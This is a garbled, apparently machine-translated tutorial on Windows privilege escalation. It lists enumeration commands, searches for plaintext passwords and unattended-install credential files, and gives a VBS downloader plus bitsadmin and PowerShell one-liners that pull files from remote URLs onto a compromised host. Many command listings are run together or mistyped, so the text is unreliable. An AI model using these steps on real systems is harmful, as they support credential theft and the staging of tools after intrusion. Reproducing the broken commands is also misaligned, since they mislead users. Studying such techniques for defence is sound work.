Introduced
This article is an introduction to Window's elevation of privilege, although not a comprehensive guide, but will try to cover the main technology, a list of commonly used resources at the bottom of the article for everyone to refer to.
Window privilege Elevation Basics
Initial information collection
Before starting to power up, we need to understand the basic information of the operating system, such as installation software, operating system version, connection user, port process and other information,
Determine the operating system name and version
1 |
C:\users\sanr> SystemInfo | Findstr/b/C: "Os Name"/C: "Os Version" |
View Host Name
1 |
c:\users\sanr> hostname |
View all environment variables
View user and User details
12 |
c:\users\sanr> net userc:\users\sanr> net user Sanr |
View Online Users
1 |
c:\users\sanr> Query User |
Querying terminal ports
1 |
c:\users\sanr> REG Query Hklm\system\currentcontrolset\control\terminal "" server\winstations\rdp-tcp/v PortNumber |
Network connection
Let's take a look at the system's network settings – Basic networks, routing, firewalls, etc.
View IP DNS addresses
1 |
C:\users\sanr>ipconfig/all |
To view the routing table
1 |
C:\users\sanr> Route Print |
To view the ARP cache:
View Network Connections
1 |
C:\users\sanr> Netstat-ano |
To view firewall rules:
123 |
c:\users\sanr> netstat-anoc:\users\sanr> netsh firewall show configc:\users\sanr> netsh firewall show state |
Applications and Services
View scheduled tasks on the system
1 |
C:\users\sanr> SCHTASKS/QUERY/FO list/v |
To view the process ID of a service:
1 |
C:\users\sanr> tasklist/svc |
To view a list of installed drivers:
1 |
C:\users\sanr> driverquery |
To view a Windows service that has started
1 |
c:\users\sanr> net start |
View a service Launch permission
123456789101112 |
C:\users\sanr> SC QC MYSQLA[SC] queryserviceconfig successful service_name:mysqlatype:10 win32_own_processstart_type:2 AUTO _starterror_control:1 normalbinary_path_name: "D:\Program files\phpstudy\mysql\bin\mysqld.exe" MySQLaLOAD _order_group:tag:0display_name:mysqladependencies:service_start_name:localsystem |
Use WMIC to get valuable data
View a list of installed programs for its version
1 |
c:\users\sanr> WMIC Product List Brief |
To view a list of services, processes, or startup programs:
123 |
c:\users\sanr> WMIC Service List Brief # Lists servicesc:\users\sanr> WMIC Process List Brief # Lists Processesc:\us ers\sanr> WMIC Startup list Brief # Lists Startup items |
Check for installed updates and installation dates
1 |
c:\users\sanr> WMIC QFE Get Caption,description,hotfixid,installedon |
Search, you can use specific vulnerabilities that elevate permissions
12 |
c:\users\sanr> wmic QFE Get Caption,description,hotfixid,installedon | FINDSTR/C: "Kbxxxxxxx" # Replace with a patch version that is searching for. eg–kb3000061 |
There is no output from executing the above command, which means that the patch is not installed.
Sensitive data and directories
Check for unencrypted passwords, or juicy files for sensitive information:
12345 |
c:\users\sanr> cd/c:\users\sanr> dir/b/s Password.txt # would search for all password.txt files on the filesystem. C:\users\sanr> dir/b/s config.* # would search for all files starting with ' config ' on the filesystem. c:\users\sanr> findstr/si Password *.xml *.ini *.txtc:\users\sanr> findstr/si login *.xml *.ini *.txt |
In addition, you can check unattended installation log files. These files typically contain base64 encoded passwords. You are more likely to find these files in a large enterprise, where the manual installation of a single system is impractical. The common locations of these files are:
1234 |
C:\sysprep.infc:\sysprep\sysprep.xmlc:\windows\panther\unattend\unattended.xmlc:\windows\panther\ Unattended.xml |
Directory file Operations
List all directories for d:\www:
1 |
For/d%i in (d:\www\*) do @echo%i |
The name of the folder under the current path is displayed with only 1-3 letters:
1 |
For/d%i in (???) Do @echo%i |
With the current directory as the search path, list the current directory with all EXE files for the following subdirectories:
1 |
FOR/R%i in (*.exe) do @echo%i |
Lists all files in the current directory with the following subdirectories, with the specified directory as the search path
1 |
FOR/R "F:\freehost\hmadesign\web\"%i in (*. *) do @echo%i |
Displays the contents of the a.txt, because the function of/F will be read out in A.txt:
123456789101112 |
For/f%i in (c:\1.txt) do echo%irar package c:\users\sanr> rar a-k-r-s-m3 c:\1.rar c:\foldephp Read file c:\users\sanr> c:/p Hp/php.exe "c:/www/admin/1.php" <?php$file_handle = fopen ("f:/config.asp", "R"), while (! feof ($file _handle)) {echo Fgets ($file _handle);} Fclose ($file _handle);? > |
Using the System program, file download
With this information, we can now begin the process of actually elevating our privileges.
Using VBS to let us upload files, is a VBS downloader, the principle is to download files to this computer (need to access the network):
12345678910111213141516171819202122 |
' Downloadfile.vbs ' Set your settingsstrfileurl = "Http://127.0.0.1/text.ico" strhdlocation = "D:\text.ico" ' Fetch the FIL ESet objXmlHttp = CreateObject ("MSXML2. XMLHTTP ") objXmlhttp.open "GET", Strfileurl, FalseObjxmlhttp.send () If objxmlhttp.status = Thenset Objadostream = CreateObject ("ADODB. Stream ") ObjADOStream.OpenobjADOStream.Type = 1 ' adtypebinaryobjadostream.write objXMLHTTP.ResponseBodyobjADOStream.Position = 0 ' Set The stream Position to the Startset objFSO = CreateObject ("Scripting . FileSystemObject ") If objfso.fileexists (strhdlocation) then objfso.deletefile strhdlocationset ObjFSO = Nothingobjadostream.savetofile strhdlocationobjadostream.closeset objadostream = NothingEnd IfSet ObjXMLHTTP = Nothing |
This script can be run on any version of Windows, to execute it, as follows.
1 |
C:\users\sanr> Script.exe Downloadfile.vbs |
If the operating system is Windows7 and above, use the BITSAdmin with PowerShell:
12 |
C:\users\sanr> bitsadmin/transfer N Http://www.jd.com/favicon.ico d:\text.icoc:\users\sanr> PowerShell ( New-object System.Net.WebClient). DownloadFile (' Http://www.jd.com/favicon.ico ', ' Text.ico ') |
There are other ways to download files, such as ftp PHP python, which can be selected according to your needs.
Windows privilege elevation Basics and commands